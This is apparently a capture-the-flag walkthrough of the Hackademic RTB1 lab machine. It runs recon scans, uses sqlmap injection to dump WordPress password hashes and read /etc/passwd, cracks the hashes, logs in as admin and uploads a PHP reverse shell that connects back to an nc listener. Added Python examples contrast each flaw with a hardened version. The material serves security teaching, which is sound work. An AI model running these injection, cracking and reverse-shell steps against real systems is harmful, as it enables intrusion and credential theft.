root@kali:~# netdiscover
Currently scanning: 192.168.65.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
 IP              At MAC Address     Count  Len  MAC Vendor
-----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df  01     060  CADMUS COMPUTER SYSTEMS
 192.168.56.100  08:00:27:4d:e2:d8  01     060  CADMUS COMPUTER SYSTEMS
 192.168.56.104  00:0c:29:01:8a:4d  01     060  VMware, Inc.
root@kali:~# ifconfig eth0 192.168.56.101 netmask 255.255.255.0
root@kali:~# unicornscan 192.168.56.104
TCP open http[ 80] from 192.168.56.104 ttl 64
Main [Error chld.c:53] am i missing children?, oh well
root@kali:~# nmap -sS -sV -O 192.168.56.104 -pT:80
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-12 13:23 CET
Nmap scan report for 192.168.56.104
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.22 - 2.6.36 (98%), Linux 2.6.24 - 2.6.36 (95%), Linux 2.6.32 (95%), Linux 2.6.23 - 2.6.38 (94%), Linux 2.6.31 (94%), Linux 2.6.31 - 2.6.35 (94%), Linux 2.6.9 - 2.6.18 (94%), Linux 2.6.9 - 2.6.27 (94%), DirecTV HR34 DVR (Linux 2.6.22) (93%), Check Point VPN-1 UTM appliance (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.87 seconds
root@kali:~# nikto -host 192.168.56.104
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.104
+ Target Hostname: 192.168.56.104
+ Target Port: 80
+ Start Time: 2013-11-12 13:25:18 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ Server leaks inodes via ETags, header found with file /, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2013-11-12 13:25:26 (GMT1) (8 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.104/
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Nov 12 13:25:50 2013
URL_BASE: http://192.168.56.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.56.104/ ----
+ http://192.168.56.104/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.56.104/index.html (CODE:200|SIZE:1475)
+ http://192.168.56.104/phpMyAdmin (CODE:403|SIZE:292)
+ http://192.168.56.104/phpmyadmin (CODE:403|SIZE:292)
-----------------
DOWNLOADED: 4592 - FOUND: 4
Opening http://192.168.56.104 in Iceweasel leads to the WordPress install at http://192.168.56.104/Hackademic_RTB1/ . Category links carry a numeric cat parameter, e.g. http://192.168.56.104/Hackademic_RTB1/?cat=1, which is handed straight to sqlmap:
sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbs
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
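What sqlmap is exploiting here is a category id concatenated straight into the SQL text. The following Python example is added here and is not code from the page or from WordPress: it reproduces the pattern against an in-memory SQLite copy of a wp_users table (rows are constructed stand-ins, not a real dump), runs the kind of UNION payload sqlmap automates once it knows the column count, and shows that the same payload is inert against a parameterized query.

```python
import sqlite3

# Constructed sample rows standing in for wp_users and the posts table.
SAMPLE_USERS = [
    (1, "NickJames", "21232f297a57a5a743894a0e4a801fc3", 1),
    (3, "GeorgeMiller", "7cbb3252ba6b7e9c422fac5334d22054", 10),
]
SAMPLE_POSTS = [
    (1, 1, "Hello world"),   # (post id, category id, title)
    (2, 2, "Second post"),
]

def build_db():
    """In-memory SQLite database with a minimal wp_users / wp_posts schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users(ID INTEGER, user_login TEXT, user_pass TEXT, user_level INTEGER);
        CREATE TABLE wp_posts(ID INTEGER, cat INTEGER, post_title TEXT);
    """)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?)", SAMPLE_POSTS)
    return conn

def posts_in_category_vulnerable(conn, cat):
    """The WordPress 1.5 pattern: the request parameter is interpolated into the query."""
    sql = "SELECT ID, post_title FROM wp_posts WHERE cat = %s" % cat
    return conn.execute(sql).fetchall()

def posts_in_category_safe(conn, cat):
    """Parameterized: the value travels separately from the SQL text, so it is
    compared as data. A payload string simply matches no integer category."""
    return conn.execute(
        "SELECT ID, post_title FROM wp_posts WHERE cat = ?", (cat,)
    ).fetchall()

# UNION payload of the kind sqlmap generates after fingerprinting two result
# columns and learning the table and column names (here from --dbs / --tables).
UNION_PAYLOAD = "1 UNION SELECT user_login, user_pass FROM wp_users"

def demo():
    """Run both query styles against the same payload and return the results."""
    conn = build_db()
    return {
        "vulnerable": posts_in_category_vulnerable(conn, UNION_PAYLOAD),
        "safe": posts_in_category_safe(conn, UNION_PAYLOAD),
    }

if __name__ == "__main__":
    for style, rows in demo().items():
        print(style, rows)
```

The vulnerable query returns the post rows plus one (login, hash) pair per user, which is exactly the table sqlmap prints below; the parameterized query returns nothing for the same input.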
sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C ID,user_login,user_pass,user_level --dump
+----+---------------------------------------------+--------------+------------+
| ID | user_pass                                   | user_login   | user_level |
+----+---------------------------------------------+--------------+------------+
| 1  | 21232f297a57a5a743894a0e4a801fc3 (admin)    | NickJames    | 1          |
| 2  | b986448f0bb9e5e124ca91d3d650f52c            | JohnSmith    | 0          |
| 3  | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   | GeorgeMiller | 10         |
| 4  | a6e514f9486b83cb53d8d932f9a04292 (napoleon) | TonyBlack    | 0          |
| 5  | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  | JasonKonnors | 0          |
| 6  | 50484c19f1afdaf3841a0d821ed393d2 (kernel)   | MaxBucky     | 0          |
+----+---------------------------------------------+--------------+------------+
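WordPress 1.5 stored passwords as plain, unsalted MD5, which is why sqlmap could annotate five of the six hashes with their plaintext from its built-in wordlist: one MD5 computation per candidate tests that guess against every user at once. The Python example below is added here, not taken from the page or from sqlmap; it runs the same dictionary attack over the dumped hashes with a small constructed wordlist, and, for contrast, stores and verifies a password with a per-user salt and PBKDF2, where a precomputed lookup no longer transfers between accounts.

```python
import hashlib
import hmac
import os

# The dumped wp_users rows from the sqlmap output above (login -> MD5 hex).
DUMPED_HASHES = {
    "NickJames":    "21232f297a57a5a743894a0e4a801fc3",
    "JohnSmith":    "b986448f0bb9e5e124ca91d3d650f52c",
    "GeorgeMiller": "7cbb3252ba6b7e9c422fac5334d22054",
    "TonyBlack":    "a6e514f9486b83cb53d8d932f9a04292",
    "JasonKonnors": "8601f6e1028a8e8a966f6c33fcd9aec4",
    "MaxBucky":     "50484c19f1afdaf3841a0d821ed393d2",
}

# Constructed wordlist for illustration; a real run would use rockyou.txt or similar.
WORDLIST = ["123456", "password", "admin", "q1w2e3", "napoleon",
            "maxwell", "kernel", "letmein", "wordpress"]

def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()

def crack_unsalted_md5(hashes, wordlist):
    """Dictionary attack on unsalted MD5: hash each candidate once, then look
    every user's hash up in that table. Returns {login: plaintext} for hits."""
    lookup = {md5_hex(w): w for w in wordlist}
    return {login: lookup[h] for login, h in hashes.items() if h in lookup}

def store_password(password, rounds=100_000):
    """Salted, iterated storage: 16 random salt bytes, PBKDF2-HMAC-SHA256.
    Format (an assumption for this example): salt_hex$rounds$dk_hex."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return "%s$%d$%s" % (salt.hex(), rounds, dk.hex())

def verify_password(password, stored):
    """Recompute with the stored salt and rounds; constant-time compare."""
    salt_hex, rounds, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)

def same_password_same_hash(password):
    """Unsalted MD5 gives identical hashes for identical passwords; salted
    storage does not, so a cracked hash reveals nothing about other accounts."""
    return (md5_hex(password) == md5_hex(password),
            store_password(password) == store_password(password))

if __name__ == "__main__":
    for login, pw in crack_unsalted_md5(DUMPED_HASHES, WORDLIST).items():
        print("%-13s %s" % (login, pw))
```

JohnSmith's hash is the one that stays uncracked in this run, as in the sqlmap output; the rest fall to a nine-word list.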
sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --file-read="/etc/passwd"
On MySQL sqlmap implements this with LOAD_FILE(), so it only works when the application's database user holds the FILE privilege and the mysqld process can read the target; both hold here, and /etc/passwd comes back:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bi
root@kali:/usr/share/dirb# dirb http://192.168.56.104//Hackademic_RTB1/
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Nov 12 13:46:45 2013
URL_BASE: http://192.168.56.104//Hackademic_RTB1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.56.104//Hackademic_RTB1/ ----
+ http://192.168.56.104//Hackademic_RTB1/index.php (CODE:500|SIZE:1881)
+ http://192.168.56.104//Hackademic_RTB1/wp-admin (CODE:301|SIZE:335)
+ http://192.168.56.104//Hackademic_RTB1/wp-content (CODE:301|SIZE:337)
+ http://192.168.56.104//Hackademic_RTB1/wp-images (CODE:301|SIZE:336)
+ http://192.168.56.104//Hackademic_RTB1/wp-includes (CODE:301|SIZE:338)
+ http://192.168.56.104//Hackademic_RTB1/xmlrpc.php (CODE:200|SIZE:42)
-----------------
DOWNLOADED: 4592 - FOUND: 6
root@kali:~# wpscan --url 192.168.56.104//Hackademic_RTB1
____________________________________________________
WPScan v2.1rNA
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
| URL: http://192.168.56.104//Hackademic_RTB1/
| Started on Tue Nov 12 13:47:05 2013
[!] The WordPress 'http://192.168.56.104/Hackademic_RTB1/readme.html' file exists
[+] XML-RPC Interface available under /Hackademic_RTB1/xmlrpc.php
[+] WordPress version 1.5.1.1 identified from meta generator
[!] We have identified 4 vulnerabilities from the version number :
|
| * Title: WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit
| * Reference: http://www.exploit-db.com/exploits/1059/
|
| * Title: WordPress <= 1.5.1.1 SQL Injection Exploit
| * Reference: http://www.exploit-db.com/exploits/1033/
|
| * Title: XMLRPC Pingback API Internal/External Port Scanning
| * Reference: https://github.com/FireFart/WordpressPingbackPortScanner
|
| * Title: WordPress XMLRPC pingback additional issues
| * Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html
[+] The WordPress theme in use is starburst
| Name: starburst
| Location: http://192.168.56.104/Hackademic_RTB1/wp-content/themes/starburst/
[+] Enumerating plugins from passive detection ...
No plugins found :(
[+] Finished at Tue Nov 12 13:47:05 2013
[+] Elapsed time: 00:00:00
GeorgeMiller has user_level 10, the administrator level in WordPress 1.5's user-level scheme, and his hash cracked to q1w2e3, so that account is used to log in:
http://192.168.56.104/Hackademic_RTB1/wp-admin
username: GeorgeMiller password: q1w2e3
http://192.168.56.104/Hackademic_RTB1/wp-admin/options-misc.php?updated=true
Under Miscellaneous Options, enable Allow File Uploads and add php to the extension list:
Allowed file extensions: jpg jpeg gif png php
A PHP reverse shell then goes through the ordinary media uploader:
http://192.168.56.104/Hackademic_RTB1/wp-admin/upload.php
File uploaded!
Your file phpreverse.php was uploaded successfully!
Here's the code to display it:
<a href='/Hackademic_RTB1/wp-content/phpreverse.php' title=''>
Image Details:
Name: phpreverse.php
Size: 5.37 KB
Type: application/x-php
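The settings change above is the whole vulnerability: WordPress 1.5 decides what to accept purely from an extension list an administrator can edit, and the file lands in a web-served directory where Apache executes .php. The Python example below is added here and is not WordPress code; it models that extension-only check beside a hardened version that fixes the allowlist in code, rejects executable extensions in any dotted segment (relevant where Apache's AddHandler matches inner segments such as shell.php.jpg), and sniffs the content's magic bytes. Filenames and file contents are constructed.

```python
import os

# Weak policy as configured on the target: the admin-editable list now includes php.
WEAK_ALLOWED = {"jpg", "jpeg", "gif", "png", "php"}

# Hardened policy: fixed in code, image types only, plus a denylist of
# extensions the web server may hand to an interpreter.
IMAGE_ALLOWED = {"jpg", "jpeg", "gif", "png"}
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "sh"}

# Leading bytes each accepted image type must start with.
MAGIC = {
    "png":  b"\x89PNG\r\n\x1a\n",
    "gif":  b"GIF8",
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}

def weak_check(filename):
    """WordPress 1.5 style: only the text after the last dot is consulted."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in WEAK_ALLOWED

def hardened_check(filename, content):
    """Extension allowlist + executable-segment denylist + content sniffing."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2:
        return False
    ext = parts[-1]
    if any(p in EXECUTABLE_EXTS for p in parts[1:]):
        return False
    if ext not in IMAGE_ALLOWED:
        return False
    return content.startswith(MAGIC[ext])

# Constructed uploads: a script, a double-extension script, a script with an
# image extension, and a minimal genuine PNG header.
SCRIPT_STUB = b"<?php /* constructed stand-in for an uploaded script */ ?>"
SAMPLES = {
    "phpreverse.php": SCRIPT_STUB,
    "shell.php.jpg":  SCRIPT_STUB,
    "fake.png":       SCRIPT_STUB,
    "real.png":       b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}

def evaluate(samples=SAMPLES):
    """Return {filename: (accepted_by_weak_check, accepted_by_hardened_check)}."""
    return {name: (weak_check(name), hardened_check(name, data))
            for name, data in samples.items()}

if __name__ == "__main__":
    for name, (weak, hard) in evaluate().items():
        print("%-16s weak=%-5s hardened=%s" % (name, weak, hard))
```

Under the weak policy every sample is accepted, including the script that was actually uploaded here; the hardened check lets only the real PNG through.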
root@kali:~# nc -l -v -p 1234
listening on [any] 1234 ...
Requesting the uploaded file in the browser runs it server-side, and the shell connects back to the listener:
192.168.56.104/Hackademic_RTB1/wp-content/phpreverse.php
192.168.56.104: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.104] 53071
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
16:13:10 up 1:53, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=489(apache) groups=489(apache)
sh: no job control in this shell
sh-4.0$ id
id
uid=48(apache) gid=489(apache) groups=489(apache)
sh-4.0$ pwd
pwd
/
Next phase: privilege escalation...